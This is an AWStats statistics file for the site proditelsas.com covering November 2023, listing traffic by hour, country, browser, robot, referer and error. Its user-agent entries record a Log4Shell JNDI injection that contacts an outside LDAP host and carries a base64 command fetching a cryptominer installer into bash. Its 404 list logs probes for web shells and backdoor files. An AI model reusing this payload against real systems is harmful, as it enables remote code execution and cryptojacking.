AWSTATS DATA FILE 7.8 (build 20200416)
# If you remove this file, all statistics for date 202311 will be lost/reset.
# Last config file used to build this data file was /home/z1h9uk8mq9i3/tmp/awstats/awstats.proditelsas.com.conf.

# Position (offset in bytes) in this file for beginning of each section for
# direct I/O access. If you made changes somewhere in this file, you should
# also remove completely the MAP section (AWStats will rewrite it at next
# update).
BEGIN_MAP 28
POS_GENERAL 2016                
POS_TIME 2698                
POS_VISITOR 38731               
POS_DAY 65079               
POS_DOMAIN 3588                
POS_LOGIN 4457                
POS_ROBOT 4612                
POS_WORMS 5439                
POS_EMAILSENDER 5570                
POS_EMAILRECEIVER 5713                
POS_SESSION 65934               
POS_SIDER 66144               
POS_FILETYPES 5848                
POS_DOWNLOADS 6159                
POS_OS 6439                
POS_BROWSER 6914                
POS_SCREENSIZE 10591               
POS_UNKNOWNREFERER 10665               
POS_UNKNOWNREFERERBROWSER 12404               
POS_ORIGIN 13489               
POS_SEREFERRALS 13636               
POS_PAGEREFS 13881               
POS_SEARCHWORDS 18451               
POS_KEYWORDS 18678               
POS_MISC 2362                
POS_ERRORS 18809               
POS_CLUSTER 4313                
POS_SIDER_404 18970               
END_MAP

# LastLine    = Date of last record processed - Last record line number in last log - Last record offset in last log - Last record signature value
# FirstTime   = Date of first visit for history file
# LastTime    = Date of last visit for history file
# LastUpdate  = Date of last update - Nb of parsed records - Nb of parsed old records - Nb of parsed new records - Nb of parsed corrupted - Nb of parsed dropped
# TotalVisits = Number of visits
# TotalUnique = Number of unique visitors
# MonthHostsKnown   = Number of hosts known
# MonthHostsUnKnown = Number of hosts unknown
BEGIN_GENERAL 8
LastLine 20231201000846 222 57616 12491305642003
FirstTime 20231101000914
LastTime 20231130223317
LastUpdate 20231201050807 222 0 221 0 0
TotalVisits 829                 
TotalUnique 649                 
MonthHostsKnown 0                   
MonthHostsUnknown 695                 
END_GENERAL

# Misc ID - Pages - Hits - Bandwidth
BEGIN_MISC 10
AddToFavourites 0 0 0
RealPlayerSupport 0 0 0
PDFSupport 0 0 0
FlashSupport 0 0 0
DirectorSupport 0 0 0
JavaEnabled 0 0 0
JavascriptDisabled 0 0 0
QuickTimeSupport 0 0 0
WindowsMediaPlayerSupport 0 0 0
TotalMisc 0 0 0
END_MISC

# Hour - Pages - Hits - Bandwidth - Not viewed Pages - Not viewed Hits - Not viewed Bandwidth
BEGIN_TIME 24
0 52 73 2467428 58 91 190819
1 59 59 311026 70 115 2469856
2 41 41 241362 73 116 2440427
3 46 93 10597853 81 121 886108
4 38 38 101370 54 111 338230
5 75 145 11849884 74 164 2723950
6 72 190 53600768 53 90 329906
7 86 234 32077325 75 124 495181
8 66 149 29126966 85 133 3425050
9 46 74 4738180 54 86 2427689
10 63 155 21403870 43 95 2266321
11 140 292 21162193 73 109 804251
12 127 275 14976239 202 273 4003430
13 62 77 1503934 702 777 419360
14 69 162 22407986 32 53 186311
15 37 60 4658702 44 118 5205147
16 57 134 31527254 66 141 2295939
17 66 98 4744431 200 235 169741
18 48 62 2432046 82 147 2439327
19 78 95 2625240 315 347 258321
20 82 82 222337 179 211 2089420
21 54 56 297717 235 289 346695
22 42 42 206799 51 91 287780
23 109 125 7298439 193 229 232985
END_TIME

# Domain - Pages - Hits - Bandwidth
# The 25 first Pages must be first (order not required for others)
BEGIN_DOMAIN 45
us 479 651 28946966
co 276 938 145619510
ru 134 139 390711
jp 88 88 94645
cn 88 110 2653246
de 74 88 2539423
gb 66 67 91954
ca 54 56 183075
md 49 49 589513
in 41 55 2328602
fr 25 53 4699696
se 25 25 271574
ro 23 23 105183
il 21 113 45333638
sc 20 20 57314
be 19 19 18826
ua 15 15 138852
eu 13 13 38570
pa 11 58 16136448
bo 9 81 15639296
bg 8 8 64715
ar 8 72 13080610
kr 6 6 21083
nl 6 6 16075
ee 6 6 18828
au 5 5 4045
pe 0 1 491746
ao 5 5 25393
br 1 1 4264
it 5 5 24154
bj 4 4 17056
eg 1 1 11874
id 4 4 10996
ma 1 1 4264
es 2 2 3474
lb 3 3 8247
ir 3 3 13035
cl 2 2 5498
bf 2 2 8528
tr 3 3 18332
za 3 3 9762
gr 1 1 4264
cz 3 3 40786
hk 2 2 5498
zz 1 1 17038
END_DOMAIN

# Cluster ID - Pages - Hits - Bandwidth
BEGIN_CLUSTER 0
END_CLUSTER

# Login - Pages - Hits - Bandwidth - Last visit
# The 10 first Pages must be first (order not required for others)
BEGIN_LOGIN 0
END_LOGIN

# Robot ID - Hits - Bandwidth - Last visit - Hits on robots.txt
# The 25 first Hits must be first (order not required for others)
BEGIN_ROBOT 19
Googlebot/ 773 5553528 20231130212726 0
AhrefsBot/ 219 20165648 20231130191646 0
bingbot/ 142 1177349 20231130121207 0
Go\-http\-client/ 36 63674 20231128043202 0
Applebot/ 25 2131383 20231127124726 0
SemrushBot/ 22 81676 20231130225329 0
Googlebot\-Image/ 21 4797539 20231120032626 0
no_user_agent 17 242006 20231130070559 0
Barkrowler 13 43790 20231109094133 0
nbot 7 27351 20231108074346 0
curl 7 12021 20231126092019 0
MJ12bot/ 5 18514 20231129220401 0
unknown 4 3236 20231128211040 4
bot[\s_+:,\.\;\/\\-] 4 17056 20231118012417 0
libwww\-perl 1 17038 20231110065729 0
crawl 1 4264 20231123035107 0
survey 1 17038 20231104180350 0
Wget/ 1 1737 20231110020003 0
java 1 4264 20231108210718 0
END_ROBOT

# Worm ID - Hits - Bandwidth - Last visit
# The 5 first Hits must be first (order not required for others)
BEGIN_WORMS 0
END_WORMS

# EMail - Hits - Bandwidth - Last visit
# The 20 first Hits must be first (order not required for others)
BEGIN_EMAILSENDER 0
END_EMAILSENDER

# EMail - Hits - Bandwidth - Last visit
# The 20 first hits must be first (order not required for others)
BEGIN_EMAILRECEIVER 0
END_EMAILRECEIVER

# Files type - Hits - Bandwidth - Bandwidth without compression - Bandwidth after compression
BEGIN_FILETYPES 13
pdf 32 11008637 0 0
gif 38 21441 0 0
staff 2 72 0 0
js 326 3466754 0 0
html 311 1764722 0 0
Unknown 48 100377 0 0
css 185 288577 0 0
woff 4 174288 0 0
json 1 206 0 0
jpg 380 141878192 0 0
php 1245 3872744 0 0
xml 4 3236 0 0
png 235 117227361 0 0
END_FILETYPES

# Downloads - Hits - Bandwidth
BEGIN_DOWNLOADS 7
/contrato.pdf 8 0 3345538
/ficha%20tecnica.pdf 7 4 4146481
/ELEMENTOS%20DE%20SEGURIDAD.pdf 5 0 1976488
/atencion.pdf 5 0 938141
/disponibilidad.pdf 5 0 964604
/Decreto%201524%20de%202002.pdf 4 0 1189662
/Decreto%20067.pdf 3 0 30675
END_DOWNLOADS

# OS ID - Hits
BEGIN_OS ID - Hits - Pages 29
macosx8 5 0
androidkitkat 5 5
macosx13 18 4
androidmarshmallow 1 1
macosx11 1 1
macosx6 3 1
ios_ipad 1 1
androidpie 24 8
winxp 9 4
win10 1412 753
macosx9 13 2
win8.1 33 23
android 17 3
macosx 85 75
Unknown 297 276
winlong 15 11
macosx5 2 2
linuxubuntu 65 46
macosx15 100 65
unix 1 1
linux 127 107
macosx10 17 3
ios_iphone 172 90
win8 9 6
win7 104 72
macosx7 20 10
winnt 4 2
android10 252 40
androidnougat 3 3
END_OS

# Browser ID - Hits - Pages
BEGIN_BROWSER 176
chrome103.0.5042.0 2 2
msie8.0 1 1
chrome32.0.1667.0 1 1
chrome81.0.4044.129 2 2
chrome105.0.0.0 3 3
chrome94.0.103 1 1
opera103.0.0.0 6 6
safari 63 8
chrome79.0.1751 1 0
chrome79.0.3945.130 8 8
chrome66.0.3359.158 1 1
chrome116.0.0.0 1 1
chrome58.0.626 1 0
chrome44.0.2403.157 3 3
chrome119.0.0.0 455 61
safari5.1.9 1 0
chrome78.0.3904.108 55 55
chrome13.0.782.41 1 1
chrome100.0.762 1 1
safari16.0 1 1
chrome119.0.6045.123 2 0
chrome108.0.0.0 43 43
firefox24.0 2 1
chrome32.0.1700.68 3 1
safari10.0 1 1
firefox102.0 2 2
chrome87.0.4280.141 15 1
chrome86.0.4240.183 3 3
chrome119.0.6045.159 2 2
chrome51.0.3014.107 1 1
chrome110.0.0.0 4 4
chrome39.0.2171.95 1 1
opera105.0.0.0 64 61
chrome75.0.3770.100 2 2
chrome92.0.4515.159 12 12
chrome22.0.1229.56 1 1
chrome31.0.1650.63 22 6
chrome102.0.0.0 11 4
safari16.6 16 2
firefox108.0 5 5
chrome109.0.0.0 127 25
firefox47.0 1 1
chrome196.3.1597.530 5 5
chrome88.0.4324.190 2 2
chrome49.0.2623.112 5 1
chrome59.0.3090.72 1 1
safari16.5 12 12
chrome36.0.1985.67 2 2
chrome31.0.1650.57 7 0
chrome69.0.3464.0 4 4
chrome66.0.3359.117 12 12
chrome100.0.4896.75 15 1
chrome115.0.0.0 20 6
opera104.0.0.0 192 117
safari16.1 3 3
chrome43.0.2357.93 1 1
chrome83.0.4103.61 4 4
chrome58.0.3029.110 1 1
chrome55.0.2869.0 1 1
chrome106.0.0.0 2 2
safari6.0.5 1 0
chrome59.0.3071.125 1 1
chrome101.0.4951.67 16 2
chrome12.0.742.91 2 0
chrome52.0.2743.98 1 1
safari16.5.1 36 9
safari15.4 7 7
firefox33.0 1 0
chrome103.0.5060.71 1 1
chrome112.0.0.0 8 8
safari15.6.1 2 2
chrome41.0.2227.0 1 0
safari9.0 1 1
chrome52.0.2743.116 2 2
chrome118.0.0.0 166 19
safari13.0.3 60 60
firefox72.0 3 3
firefox27.0 3 0
chrome100.0.4896.60 2 2
chrome103.0.5060.114 27 27
chrome32.0.1700.72 4 1
chrome89.0.4389.82 1 1
firefox115.0 11 11
chrome80.0.3987.132 15 1
msie11.0 8 2
chrome67.0.3396.99 9 9
firefox119.0 66 8
chrome103.0.5060.134 15 1
chrome100.0.4758.11 1 1
netscape 3 3
chrome91.0.4472.114 6 6
firefox29.0 2 0
chrome70.0.3538.77 2 2
chrome97.0.4692.71 1 1
chrome91.0.4472.101 15 1
chrome72.0.3626.121 1 1
firefox26.0 13 3
chrome62.0.3202.94 2 2
chrome113.0.0.0 1 1
chrome94.0.130 1 0
chrome57 2 2
msie11 2 1
chrome84.0.4147.105 2 2
chrome56.0.3018.58 1 1
chrome36.0.1985.138 1 1
chrome62.0.3202.9 6 6
chrome32.0.1700.41 1 0
netscape5.0 75 75
msie9.0 2 1
opera82.0.4227.44 1 1
safari7.0.1 2 0
edge44 10 10
chrome65.0.3325.146 3 3
opera95.0.0.0 1 0
safari5.0 2 2
chrome102.0.5005.63 15 1
chrome80.0.3987.162 1 1
chrome103.0.5060.53 11 11
chrome107.0.0.0 1 1
firefox109.0 1 1
chrome66.0.3359.181 6 6
opera89.0.4447.51 33 33
mozilla 129 110
chrome114.0.0.0 202 179
chrome56.0.2924.87 1 1
Unknown 95 95
chrome85.0.4183.120 21 5
chrome77.0.2210 1 1
chrome103.0.5060.66 13 13
safari6.1 8 0
chrome68.0.3440.106 5 5
chrome103.0.0.0 39 39
opera55.0.2994.44 3 3
firefox19.0 1 1
chrome51.0.2704.103 1 1
firefox25.0 7 1
msie10.0 3 1
chrome74.0.3729.169 9 9
chrome79.0.3945.74 3 3
chrome34.0.1847.116 7 7
chrome94.0.4606.61 9 9
firefox110.0 4 4
firefox114.0 68 68
chrome15.0.874.120 1 1
chrome86.0.1752 1 1
chrome67.0.2821.103 1 1
chrome96.0.4664.110 8 8
chrome63.0.603 1 1
android 4 4
lynx 1 1
firefox104.0 1 1
chrome117.0.0.0 15 1
opera12.16 1 0
chrome18.6.872.0 1 1
chrome76.0.1839 1 1
opera94.0.0.0 1 1
firefox31.0 2 0
firefox83.0 6 6
safari6.1.1 3 1
firefox28.0 1 0
chrome17.0.963.56 9 9
chrome104.0.0.0 15 1
chrome85.0.4183.121 1 1
chrome68.0.3440.84 3 3
chrome87.0.4280.88 10 2
chrome65.0.3152.119 1 1
chrome74.0.3694.0 15 1
chrome51.0.2704.81 1 1
firefox45.0 1 1
chrome107.0.535 1 0
chrome95.0.4638.54 1 1
chrome65.0.3325.181 4 4
firefox36.0 3 0
chrome99.0.4896.127 9 9
safari7.0 1 0
chrome60.0.3112.113 128 128
END_BROWSER

# Screen size - Hits
BEGIN_SCREENSIZE 0
END_SCREENSIZE

# Unknown referer OS - Last visit date
BEGIN_UNKNOWNREFERER 22
Mozilla_33741328 20231108234449
Python/3.11_aiohttp/3.8.4 20231129154522
Lynx/2.8.5rel.1_libwww-FM/2.14_SSL-MM/1.4.1_GNUTLS/0.8.12 20231112141628
Mozilla/5.0_(compatible;_InternetMeasurement/1.0;__https://internet-measurement.com/) 20231128174631
'Mozilla/5.0 20231108234509
Mozilla/6.0_(compatible) 20231122061915
python-requests/2.27.1 20231120083602
Mozilla/5.0_(compatible;_CensysInspect/1.1;__https://about.censys.io/) 20231130202023
Mozilla/5.0_AppleWebKit/537.36_(KHTML,_like_Gecko;_compatible;_GoogleOther)_Chrome/119.0.6045.123_Safari/537.36 20231126034435
Mozilla/5.0 20231128114530
Mozilla/5.0_(compatible;_Dataprovider.com) 20231119055153
TheSafeInternetSearch 20231127131132
Mozilla/5.0_(compatible) 20231122061909
Mozilla/5.0_zgrab/0.x 20231125133203
\ 20231110110232
python-requests/2.31.0 20231128110756
Python/3.9_aiohttp/3.8.3 20231116101944
cpp-httplib/0.10.9 20231104212638
python-requests/2.25.1 20231127070205
t('${${env:NaN:-j}ndi${env:NaN:-:}${env:NaN:-l}dap${env:NaN:-:}//174.138.82.190:1389/TomcatBypass/Command/Base64/Y3VybCAtcyAtTCBodHRwczovL3Jhdy5naXRodWJ1c2VyY29udGVudC5jb20vQzNQb29sL3htcmlnX3NldHVwL21hc3Rlci9zZXR1cF9jM3Bvb2xfbWluZXIuc2ggfCBiYXNoIC1zIDQ4Nnhxdzd5c1hkS3c3UmtWelQ1dGRTaUR0RTZzb3hVZFlhR2FHRTFHb2FDZHZCRjdyVmc1b01YTDlwRngzckIxV1VDWnJKdmQ2QUhNRldpcGVZdDVlRk5VeDlwbUdO}') 20231128065446
Expanse,_a_Palo_Alto_Networks_company,_searches_across_the_global_IPv4_space_multiple_times_per_day_to_identify_customers&#39;_presences_on_the_Internet._If_you_would_like_to_be_excluded_from_our_scans,_please_send_IP_addresses/domains_to:_scaninfo@paloaltonetworks.com 20231129015843
python-requests/2.28.2 20231127005603
END_UNKNOWNREFERER

# Unknown referer Browser - Last visit date
BEGIN_UNKNOWNREFERERBROWSER 11
\ 20231110110232
python-requests/2.31.0 20231128110756
Python/3.9_aiohttp/3.8.3 20231116101944
python-requests/2.27.1 20231120083602
cpp-httplib/0.10.9 20231104212638
python-requests/2.25.1 20231127070205
t('${${env:NaN:-j}ndi${env:NaN:-:}${env:NaN:-l}dap${env:NaN:-:}//174.138.82.190:1389/TomcatBypass/Command/Base64/Y3VybCAtcyAtTCBodHRwczovL3Jhdy5naXRodWJ1c2VyY29udGVudC5jb20vQzNQb29sL3htcmlnX3NldHVwL21hc3Rlci9zZXR1cF9jM3Bvb2xfbWluZXIuc2ggfCBiYXNoIC1zIDQ4Nnhxdzd5c1hkS3c3UmtWelQ1dGRTaUR0RTZzb3hVZFlhR2FHRTFHb2FDZHZCRjdyVmc1b01YTDlwRngzckIxV1VDWnJKdmQ2QUhNRldpcGVZdDVlRk5VeDlwbUdO}') 20231128065446
python-requests/2.28.2 20231127005603
Expanse,_a_Palo_Alto_Networks_company,_searches_across_the_global_IPv4_space_multiple_times_per_day_to_identify_customers&#39;_presences_on_the_Internet._If_you_would_like_to_be_excluded_from_our_scans,_please_send_IP_addresses/domains_to:_scaninfo@paloaltonetworks.com 20231129015843
Python/3.11_aiohttp/3.8.4 20231129154522
TheSafeInternetSearch 20231127131132
END_UNKNOWNREFERERBROWSER

# Origin - Pages - Hits 
BEGIN_ORIGIN 6
From0 582 677
From1 17 17
From2 54 60
From3 441 441
From4 521 1620
From5 0 0
END_ORIGIN

# Search engine referers ID - Pages - Hits
BEGIN_SEREFERRALS 5
www_google_com 47 53
search_yahoo_catchall 1 1
www_google_com_co 2 2
google_com 2 2
www_bing_com 2 2
END_SEREFERRALS

# External page referers - Pages - Hits
# The 25 first Pages must be first (order not required for others)
BEGIN_PAGEREFS 96
http://181.119.64.134:8080 120 120
http://181.225.72.214:8080 112 112
http://181.225.72.214:8080/actuator/gateway/routes 13 13
http://181.119.64.134:8080/actuator/gateway/routes 13 13
http://181.119.64.134:8080/favicon.ico 8 8
http://181.225.72.214:8080/favicon.ico 7 7
http://181.225.72.214:8080/login 6 6
http://181.119.64.134:8080/login 5 5
http://181.119.64.134:8080/webfig/ 4 4
http://181.119.64.134:8080/cgi-bin/authLogin.cgi 4 4
https://l.wl.co 4 4
http://181.119.64.134:8080/showLogin.cc 4 4
http://181.225.72.214:8080/is-bin 4 4
http://181.225.72.214:8080/manager/html 4 4
http://181.119.64.134:8080/static/historypage.js 4 4
http://181.225.72.214:8080/jquery-3.3.1.min.js 4 4
http://181.225.72.214:8080/fw6I 4 4
http://181.119.64.134:8080/api/session/properties 4 4
http://181.225.72.214:8080/showLogin.cc 3 3
http://181.119.64.134:8080/manager/html 3 3
http://181.225.72.214:8080/webfig/ 3 3
http://181.225.72.214:8080/static/historypage.js 3 3
http://181.119.64.134:8080/Telerik.Web.UI.WebResource.axd 3 3
http://181.225.72.214:8080/Telerik.Web.UI.WebResource.axd 3 3
http://181.225.72.214:8080/cgi-bin/authLogin.cgi 3 3
http://181.119.64.134:8080/categories/Yud 1 1
http://181.225.72.214:8080/wp-content/themes/twentytwentyone/inc/block-css.php 2 2
http://181.225.72.214:8080/nation.php 2 2
http://181.225.72.214:8080/sslvpnLogin.html 1 1
http://181.119.64.134:8080/sitemap.xml 1 1
http://181.119.64.134:8080/PSIA/index 1 1
http://181.225.72.214:8080/api/sonicos/auth 1 1
http://181.225.72.214:8080/new/login 2 2
http://181.119.64.134:8080/8.bin 1 1
http://181.225.72.214:8080/goform/set_LimitClient_cfg 1 1
http://181.225.72.214:8080/auth1.html 1 1
http://181.119.64.134:8080/onvif/device_service 1 1
http://181.119.64.134:8080/goform/set_LimitClient_cfg 1 1
http://181.225.72.214:8080/wh/glass.php 2 2
http://181.225.72.214:8080/UnityPlayer.dll 2 2
http://181.119.64.134:8080 2 2
http://181.225.72.214:8080/qd.CHM 2 2
http://181.119.64.134:8080/ttd.exe 1 1
http://181.119.64.134:8080/fw6I 2 2
http://181.225.72.214:8080/jWf5 1 1
http://181.225.72.214:8080/ti4K 1 1
http://181.119.64.134:8080/HNAP1 1 1
http://181.119.64.134:8080/news.php 1 1
http://181.225.72.214:8080 1 1
http://181.225.72.214:8080/hrsgdsb7386wknzms.jpg 2 2
http://181.119.64.134:8080/robots.txt 1 1
http://181.119.64.134:8080/js/NewWindow_2_all.js 1 1
http://181.119.64.134:8080/e3e7e71a0b28b5e96cc492e636722f73/4sVKAOvu3D/BDyot0NxyG.php 1 1
http://181.225.72.214:8080/e3e7e71a0b28b5e96cc492e636722f73/4sVKAOvu3D/BDyot0NxyG.php 2 2
http://181.119.64.134:8080/sslvpnLogin.html 1 1
http://181.225.72.214:8080/8.bin 2 2
http://181.119.64.134:8080/Gmail/UnityPlayer.txt 1 1
http://181.119.64.134:8080/jquery.js 1 1
http://181.119.64.134:8080/cluster/list.query 1 1
http://181.119.64.134:8080/zMLUH93A 1 1
http://181.225.72.214:8080/ssC3 1 1
http://181.119.64.134:8080/UnityPlayer.dll 1 1
http://181.119.64.134:8080/auth1.html 1 1
http://181.119.64.134:8080/iY8b 1 1
http://181.119.64.134:8080/hrsgdsb7386wknzms.jpg 1 1
http://181.225.72.214:8080/invoker/readonly 1 1
http://181.225.72.214:8080/Display/chan/IB61I7MYA 2 2
http://181.225.72.214:8080/auth.html 1 1
http://181.225.72.214:8080/script 1 1
http://181.119.64.134:8080/auth.html 1 1
http://181.225.72.214:8080/jenkins/login 1 1
http://181.119.64.134:8080/Display/chan/IB61I7MYA 1 1
http://181.225.72.214:8080/api/sonicos/tfa 1 1
http://181.225.72.214:8080/categories/Yud 2 2
http://181.119.64.134:8080/api/sonicos/tfa 1 1
http://181.225.72.214:8080/news.php 2 2
http://181.119.64.134:8080/is-bin 2 2
http://181.119.64.134:8080/wh/glass.php 1 1
http://181.225.72.214:8080/ttd.exe 2 2
http://181.119.64.134:8080/jquery-3.3.1.min.js 2 2
http://181.119.64.134:8080/wp-content/themes/twentytwentyone/inc/block-css.php 1 1
http://181.225.72.214:8080/boafrm/formSysCmd 2 2
http://181.225.72.214:8080/zMLUH93A 2 2
http://181.225.72.214:8080/sitemap.xml 2 2
http://181.225.72.214:8080/Gmail/UnityPlayer.txt 2 2
http://181.225.72.214:8080/jquery.js 2 2
http://181.225.72.214:8080/robots.txt 2 2
http://181.225.72.214:8080/cluster/list.query 1 1
http://181.119.64.134:8080/La9v 1 1
http://181.119.64.134:8080/api/sonicos/auth 1 1
http://181.225.72.214:8080/api/session/properties 3 3
http://181.119.64.134:8080/qd.CHM 1 1
http://181.119.64.134:8080/nation.php 1 1
http://181.225.72.214:8080/js/NewWindow_2_all.js 1 1
http://181.119.64.134:8080/new/login 1 1
http://181.225.72.214:8080/Iv9d 1 1
END_PAGEREFS

# Search keyphrases - Number of search
# The 10 first number of search must be first (order not required for others)
BEGIN_SEARCHWORDS 2
http+//proditelsas.com/caracteristicas.php 1
http+//www.proditelsas.com/ 1
END_SEARCHWORDS

# Search keywords - Number of search
# The 25 first number of search must be first (order not required for others)
BEGIN_KEYWORDS 3
http 2
//www.proditelsas.com/ 1
//proditelsas.com/caracteristicas.php 1
END_KEYWORDS

# Errors - Hits - Bandwidth
BEGIN_ERRORS 7
302 224 544
206 10 1993365
400 3 84
201 9 741
422 119 355937
404 2409 21
301 10 2440
END_ERRORS

# URL with 404 errors - Hits - Last URL referrer
BEGIN_SIDER_404 715
//wp-content/themes/gaukingo/db.php 3 -
//demo.php 3 -
//Marvins.php 3 -
//Deadcode1975.php 3 -
/wp-includes/js/ 4 -
/wp-content/themes/wp-classic/inc/index.php 1 www.google.com
/admin/plugins/blueimp/package.json 1 -
/wp-content/themes/twenty/twenty.php 2 -
/wp-content/mu-plugins/ 4 -
//tmp/vuln.php 3 -
//anon.php 3 -
//wp-content/uploads/typehub/custom/.RxR.php 3 -
/wp-includes/IXR/ 4 -
//wp-content/plugins/xsid/marijuana.php 3 -
/xmlrpc.php 6 -
/wp-admin/css/colors/modern/ 4 -
//wp-content/plugins/elementor/includes/settings/index.php 3 -
//403.php 3 -
//mar.php 3 -
//fm.php 3 -
/wp-content/ALFA_DATA/alfacgiapi/ 4 -
/wp-content/uploads/2022/ 4 -
//sym.php 3 -
/reservas/caracteristicas.php 1 -
/wp-includes/widgets/about.php 1 -
/user/login/ 2 -
/wp-content/plugins/wp-diambar/includes/ 4 -
//wpx.php 3 -
/alfa.php 3 -
//plugins.php 3 -
//zz.php 3 -
//wp-content/plugins/ioptimization/IOptimize.php 3 -
/wp-admin/css/colors/coffee/index.php 2 -
//alfanew.php7 3 -
/api/common/pool 1 -
/wp-content/plugins/royal-elementor-addons/assets/js/modal-popups.min.js 1 -
//snd.php 3 -
/wp-includes/fresh1.php 1 -
/ioxi-rex4.php7 1 -
//wsu.php 3 -
/radio.php 3 -
/wp-includes/ID3/wp-includes/IXR/ 4 -
/wp-content/plugins/paid-memberships-pro/readme.txt 1 -
/wp-content/plugins/home/ 4 -
/indx.php 1 -
//wp-content/themes/ThisWay/includes/uploadify/upload_settings_image.php 3 -
/.well-known/pki-validation/cloud.php 3 -
/wp-content/plugins/linkpreview/db.php 1 www.google.com
/simple.php 22 www.google.com
//wp-content/wp-conf.php 3 -
//wsoyanzorng.php 3 -
/css/ 4 -
//shell.php 3 -
//wp-admin/wso112233.php 3 -
//templates/beez3/error.php 3 -
/apple-touch-icon.png 2 -
//moto.php 3 -
//wp-content/plugins/hellopress/wp_filemanager.php 6 -
/mari.php 1 -
/wp-content/upgrade/ 10 -
/wp-admin/css/ 4 -
//wp-admin/wso.php 3 -
/nice.php 1 -
/home 3 -
//0x55.php 3 -
/z.php 2 -
//gecko.php 3 -
//wp-admin/css/colors/coffee/index.php 3 -
/images/ 4 -
/wp-includes/Requests/index.php 3 -
/pqr/upload/scp/ajax.php/kb/canned-response/0.json 1 http://www.proditelsas.com/pqr/upload/scp/tickets.php
/woh.php 1 www.google.com
/cong.php 2 -
/small.php 2 -
/wp-admin/ 10 -
//wp-plugins.php 3 -
/filemanager/dialog.php 1 -
//ee.php 3 -
/wp-content/plugins/wordpresscore/include.php 7 -
//themes.php 3 -
/i.php 2 -
/ws.php 1 -
//wp-info.php 3 -
/fx.php 1 -
/wp-content/plugins/aryabot/ 4 -
//wp-includes/wp-class.php 6 -
/wp-includes/customize/ 4 -
/iR7SzrsOUEP.php 5 -
//z.php 3 -
//fx.php 3 -
//uploads/up.php 3 -
/wp-includes/js/tinymce/plugins/compat3x/css/index.php 1 -
/assets/ 4 -
//wp-content/plugins/index.php 3 -
//wp-content/themes/classic/inc/casper.php 3 -
/wordpress/wp-admin/includes 4 -
/wp-content/plugins/linkpreview/ 4 -
//utchiha505.php 3 -
/images/about.php 3 -
//home.php 3 -
/wp-content/themes/optimizepress/lib/admin/media-upload.php 1 -
/wp-content/themes/thuoc-nam/ 4 -
/s.php 2 -
/ubh/ 4 -
//wp-includes/class-json-ajax-session.php 3 -
/wp-admin/network/wp-login.php 1 -
/.htacess.php 1 -
//tmpshell.php 3 -
//log.php 3 -
/wp-file.php 2 -
/xleet.php 5 -
/wp-includes/rest-api/ 4 -
/Alfa.php 2 -
/configuration.php 1 -
/wp-admin/css/colors/midnight/ 4 -
//ini.php 3 -
/wp-content/uploads/simple-file-list/ 4 -
//tron.php 3 -
/wp-includes/js/tinymce/skins/lightgray/img/index.php 4 -
/wp-content/themes/konzept/includes/uploadify/upload.php 1 -
/pqr/login.php 1 http://www.proditelsas.com/pqr/upload
//wp-admin/alfa.php 3 -
/xx.php 1 -
/wp-admin/ajax-actions.php 2 -
/wp-content/plugins/t_file_wp/t_file_wp.php 1 -
/ms.php 1 www.google.com
/r.php 1 -
//images/F0x.php 3 -
/1index.php 2 -
/wp-includes/blocks/ 4 -
//wp-content/plugins/TOPXOH/wDR.php 6 -
//an.php 3 -
/user/ 2 -
/wp-admin/setup-config.php 3 http://proditelsas.com
//h4xor.php 3 -
/wp-head.php 3 -
/fox.php 1 -
/x.php 2 -
/wp-admin/includes/index.php 1 proditelsas.com
/v.php 1 -
/wp-content/plugins/ 4 -
//lufi.php 3 -
/sh.php 1 -
/wp-content/uploads/2023/07/xl2023.php 5 -
//wp-admin/users.php 3 -
/wp-content/plugins/press/wp-class.php 1 -
/wp-info.php 1 -
//wp-admin/css/colors/blue/CasperExV1.php 3 -
/wp-includes/rest-api/about.php 2 -
/wp-includes/fonts/wp-login.php 1 -
/inputs.php 18 www.google.com
/f.php 1 -
/admin/editor/ 4 -
/ 4 -
/wp-includes/991176.php 2 -
/.well-known/ 11 -
/cakil/ 4 -
/wp-content/plugins/elementor/ 4 -
/wp-content/plugins/WordPressCore/include.php 10 -
/million.php 3 -
/.env 18 -
/wp-admin/maint/about.php 1 -
//xmlrpc2.php 3 -
/wp-content/themes/konzept/includes/uploadify/uploadify.css 1 -
/assets/filemanager/dialog.php 1 -
/wp-content/plugins/Cache/Cache.php 3 -
/admin/plugins/fileupload/server/php/index.php 1 -
//wp-content/wp_filemanager.php 3 -
//wp-admin/css/colors/blue/uploader.php 3 -
/marijuana.php 1 -
/tmps/ 4 -
/.ftpconfig 1 -
/wp-includes/js/tinymce/skins/wordpress/images/index.php 2 -
//columns.php 3 -
/mt/ 4 -
//wp-admin/includes/users.php 3 -
//wp_filemanager.php 3 -
/wso112233.php 1 -
/robots.txt 223 -
/wp-content/plugins/WordPressCore-1/include.php 6 -
/wp-content/themes/OptimizePress/lib/admin/media-upload.php 1 -
//F0x.php 3 -
//wp-content/shell20211028.php 3 -
/wp-includes/wp-class.php 1 -
/1.php 1 -
/wp-includes/SimplePie/plugins.php 2 -
/.well-known/acme-challenge/cloud.php 2 -
//wp-admin/fw.php 3 -
/plugins/content/s5_media_player/helper.php 1 -
/pqr/atencion.pdf 1 -
/jquery.easing.1.3.js 1 -
/wp-content/plugins/cache-wordpress/ 4 -
/wp-content/plugins/essential-addons-for-elementor-lite/readme.txt 2 www.google.com
/images/iR7SzrsOUEP.php 5 -
/wp-includes/customize/wp-login.php 1 -
//doc.php 3 -
/wp-content/themes/sketch/404.php 1 -
//xleet.php 3 -
//up.php 3 -
/.well-known/pki-validation/ini.php 1 -
//credits.php 3 -
/wp-content/plugins/seoplugins/mar.php 4 -
/wp-admin/about.php 1 www.google.com
/.well-known/acme-challenge/wp-login.php 1 -
/wp-content/ 10 -
/wp-includes/ID3/index.php 1 proditelsas.com
/sites/default/files/ 4 -
/upload/image/ 4 -
//admin.php 3 -
/wp-content/admin.php 5 -
/modules/ 4 -
/wp-admin/images/ 4 -
/lock360.php 5 -
/wp-content/plugins/admin.php 3 -
//about.php 3 -
//xlettt.php 3 -
//edit-comments.php 3 -
/wp-content/themes/twentyfive/ 4 -
/admin/plugins/elfinder/php/connector.php 1 -
/.well-known/pki-validation/class_api.php 2 -
/wp-admin/js/widgets/ 4 -
/shell20211028.php 4 -
/wp-content/themes/include.php 10 www.google.com
//wp_wrong_datlib.php 3 -
/misc/ajax.js 4 -
/wp-content/plugins/attire-blocks/admin/theme/color-theme.php 1 proditelsas.com
//utchiha_uploader.php 3 -
//lock0360.php 3 -
/jquery.mousewheel.js 3 -
//inbox.php 3 -
/wp-includes/Text/about.php 4 -
/wp-admin/maint/iR7SzrsOUEP.php 5 -
/wp-includes/widgets/ 4 -
//wp-content/fw.php 3 -
//font-editor.php 3 -
